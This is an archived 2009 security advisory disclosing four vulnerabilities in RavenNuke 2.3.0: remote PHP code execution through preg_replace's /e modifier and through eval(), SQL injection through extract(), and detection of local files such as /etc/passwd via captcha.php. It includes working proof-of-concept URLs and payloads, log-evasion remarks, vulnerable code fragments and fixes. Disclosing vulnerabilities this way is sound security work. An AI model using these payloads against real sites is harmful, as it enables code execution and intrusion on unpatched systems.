AOH :: HP Unsorted M :: VA2635.HTM

Multiple Vulnerabilities in RavenNuke 2.3.0



- Multiple Vulnerabilities in RavenNuke 2.3.0
- Multiple Vulnerabilities in RavenNuke 2.3.0



[waraxe-2009-SA#072] - Multiple Vulnerabilities in RavenNuke 2.3.0=0D
================================================================================0D
=0D
Author: Janek Vind "waraxe"=0D
Date: 16. February 2009=0D
Location: Estonia, Tartu=0D
Web: http://www.waraxe.us/advisory-72.html=0D 
=0D
=0D
Description of vulnerable software:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
RavenNuke is a web-based automated news publishing and content management=0D
system based on PHP and MySQL. The system is fully controlled using a web-based=0D
graphical user interface (GUI). RavenNuke is an extensively changed fork of =0D
the phpNuke\portal system.=0D
=0D
http://ravenphpscripts.com/=0D 
=0D
=0D
List of found vulnerabilities=0D
================================================================================0D
=0D
1. Remote Php Code Execution in "avatarlist.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Security risk: High=0D
=0D
Reasons:=0D
  1. uninitialized arrays "patterns" and "replacements"=0D
Preconditions:=0D
  1. attacker must be logged in as user=0D
Comments:=0D
  1. Exploit is using "preg_replace" e-modifier=0D
  2. "register_globals" setting does not matter=0D
  3. Sentinel will not stop this exploit=0D
  4. POST method will leave clean logs in most real-world cases=0D
=0D
Test using GET method:=0D
=0D
http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist=0D 
&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()=0D
=0D
Test using POST method:=0D
------------------------------------------------------------=0D
=0D
action="http://localhost/ravennuke230/modules.php?=0D name=Your_Account&op=avatarlist" method="post">=0D =0D =0D =0D =0D
=0D
=0D ------------------------------------------------------------=0D =0D Fragment of vulnerable source code:=0D ------------------------------------------------------------=0D $patterns[0] = '/\.gif/';=0D $patterns[1] = '/\.png/';=0D ...=0D $replacements[1] = '';=0D $replacements[0] = '';=0D ...=0D $entryname = preg_replace($patterns, $replacements, $entry);=0D ------------------------------------------------------------=0D =0D Solution: initialize arrays before use.=0D =0D =0D 2. Remote Php Code Execution in "Your Account" module=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D Security risk: medium=0D =0D Reasons:=0D 1. insecure use of "eval()" php function=0D Precoditions:=0D 1. Attacker must have admin rights for "Your Account" in=0D order to change custom fields=0D Comments:=0D 1. This is privilege escalation vulnerability=0D =0D Test:=0D =0D 1. log in as admin and go to "Custom Fields" in users administration:=0D =0D http://localhost/ravennuke230/admin.php?op=yaCustomFields=0D =0D 2. insert "_Z;phpinfo()" (without quotes) into input box "ID Field Name"=0D =0D 3. click "Save fields"=0D =0D 4. now go to "Users":=0D =0D http://localhost/ravennuke230/admin.php?op=yaUsers=0D =0D and select "User Details" for any user, click "OK".=0D Resulting page will display output of the "phpinfo()", done :)=0D =0D Fragment of vulnerable source code:=0D -------------------------------------------------------=0D /* Get Custom Fields and display them in desired order=0D ...=0D $result = $db->sql_query('SELECT * FROM ' . $user_prefix . '_users_fields=0D WHERE need <> "0" AND public="1" ORDER BY pos');=0D ...=0D while ($sqlvalue = $db->sql_fetchrow($result)) {=0D if (substr($sqlvalue['name'], 0, 1) == '_') =0D @eval('$name_exit = ' . $sqlvalue['name'] . ';');=0D -------------------------------------------------------=0D =0D =0D 3. Sql Injection in "Resend_Email" module=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D Security risk: medium=0D =0D Reasons:=0D 1. Insecure use of "extract()" php function=0D Preconditions:=0D 1. attacker must be logged in as admin=0D =0D Comments:=0D 1. This is privilege escalation vulnerability=0D 2. POST method will leave clean logs in most real-world cases=0D =0D Test using POST method:=0D ------------------------------------------------------------=0D
=0D
action="http://localhost/ravennuke230/modules.php=0D ?name=Resend_Email" method="post">=0D =0D =0D
=0D
=0D ------------------------------------------------------------=0D =0D Fragment of vulnerable source code:=0D ------------------------------------------------------------=0D if (!is_admin($admin)) endit(_ACCESSDENIED);=0D ...=0D extract($HTTP_POST_VARS);=0D ...=0D $result = $db->sql_query('select user_id, username, user_email, user_password,=0D user_regdate, check_num, time, requestor from '.$user_prefix.'_users_temp');=0D ------------------------------------------------------------=0D =0D Solution: use EXTR_SKIP to avoid overwriting of existing variables=0D =0D =0D 4. Remote Detection of Local Files in "captcha.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D Security risk: low=0D =0D Reasons:=0D 1. uninitialized array "aFonts"=0D Preconditions:=0D 1. "register_globals=on"=0D 2. "display_errors=on"=0D Comments:=0D 1. multiple page refreshes may needed because of source code specifics=0D 2. same method works for remote directories too!=0D =0D Attacker is able to detect existance of remote files or directories=0D via different error messages, emitted by php.=0D =0D Test 1:=0D =0D http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/waraxe=0D =0D Result:=0D =0D Warning: imageftbbox() [function.imageftbbox]: Invalid font filename in=0D C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298=0D =0D "Invalid font filename" --> file does not exist=0D =0D One more possible error message:=0D =0D Warning: imageftbbox(): Could not find/open font in ...=0D =0D "Could not find/open font" --> file does not exist=0D =0D =0D Test 2:=0D =0D http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/passwd=0D =0D Result:=0D =0D Warning: imageftbbox() [function.imageftbbox]: Could not read font in=0D C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298=0D =0D "Could not read font" --> file exists=0D =0D =0D How to fix:=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Upgrade to new version 2.30.01=0D =0D =0D Disclosure Timeline:=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D 01/16/09 Developer contacted=0D 01/16/09 Developer's initial response=0D 01/17/09 Fidings sent to developer=0D 02/15/09 Patched version 2.30.01 released by developer=0D 02/16/09 Public disclosure=0D =0D =0D Greetings:=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,=0D to all active waraxe.us forum members and to anyone else who know me!=0D =0D =0D Contact:=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D come2waraxe@yahoo.com=0D Janek Vind "waraxe"=0D =0D Waraxe forum: http://www.waraxe.us/forums.html=0D Personal homepage: http://www.janekvind.com/=0D =0D ---------------------- [ EOF ] ------------------------------=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.